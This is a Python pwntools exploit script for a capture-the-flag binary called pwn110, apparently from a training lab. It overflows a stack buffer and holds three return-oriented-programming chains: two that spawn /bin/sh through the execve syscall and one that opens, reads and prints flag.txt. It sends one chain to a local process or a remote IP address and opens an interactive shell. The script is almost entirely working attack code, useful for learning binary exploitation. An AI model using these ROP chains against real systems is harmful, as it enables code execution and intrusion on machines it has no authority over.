#!/usr/bin/env python3

from pwn import *
from struct import pack
LOCAL = (len(sys.argv)>1 and sys.argv[1].startswith('loc'))


## 1. execve generated by ROPgadget
# $ ROPgadget --binary pwn110.pwn110 --ropchain
p = b'A'*(32+8)
p += pack('<Q', 0x000000000040f4de) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e0) # @ .data
p += pack('<Q', 0x00000000004497d7) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040f4de) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x0000000000443e30) # xor rax, rax ; ret
p += pack('<Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040191a) # pop rdi ; ret
p += pack('<Q', 0x00000000004c00e0) # @ .data
p += pack('<Q', 0x000000000040f4de) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x000000000040181f) # pop rdx ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x0000000000443e30) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000470d20)*59 # add rax, 1 ; ret
p += pack('<Q', 0x00000000004012d3) # syscall (59 execve)


## 2. Much shorter handmade solution
POP_RAX = 0x004497d7  # pop rax ; ret
POP_RDI = 0x0040191a  # pop rdi ; ret
POP_RSI = 0x0040f4de  # pop rsi ; ret
POP_RDX = 0x0040181f  # pop rdx ; ret
MOV_DSI = 0x0044629f  # mov qword ptr [rdi], rsi ; ret
SYSCALL = 0x004012d3  # syscall
_DATA   = 0x004c00e0  # .data address

p2 = b'A'*(32+8)
p2 += p64(POP_RDI) + p64(_DATA)  # char *filename
p2 += p64(POP_RSI) + b'/bin/sh\x00'
p2 += p64(MOV_DSI)
p2 += p64(POP_RAX) + p64(59)  # execve https://syscalls.mebeim.net/?table=x86/64/x64/latest
p2 += p64(POP_RSI) + p64(0)   # char **argv
p2 += p64(POP_RDX) + p64(0)   # char **envp
p2 += p64(SYSCALL)


## 3. Alternative: call open+read+puts on flag.txt
OPEN = 0x00448c00
READ = 0x00448d30
PUTS = 0x00411bd0
_FD = 3 if LOCAL else 5  # /!\ remote file descriptor is 5

p3 = b'A'*(32+8)
p3 += p64(POP_RDI) + p64(_DATA)
p3 += p64(POP_RSI) + b'flag.txt'
p3 += p64(MOV_DSI)
p3 += p64(POP_RSI) + p64(0)      # flags (int)
p3 += p64(OPEN)
p3 += p64(POP_RDI) + p64(_FD)    # file descriptor (int)
p3 += p64(POP_RSI) + p64(_DATA)  # buffer (char*)
p3 += p64(POP_RDX) + p64(32)     # count (int)
p3 += p64(READ)
p3 += p64(POP_RDI) + p64(_DATA)  # buffer (char*)
p3 += p64(PUTS)


##
if LOCAL:
    conn = process('./pwn110.pwn110')
else:
    conn = remote('10.10.25.233', 9010)
conn.sendline(p2)
conn.interactive()
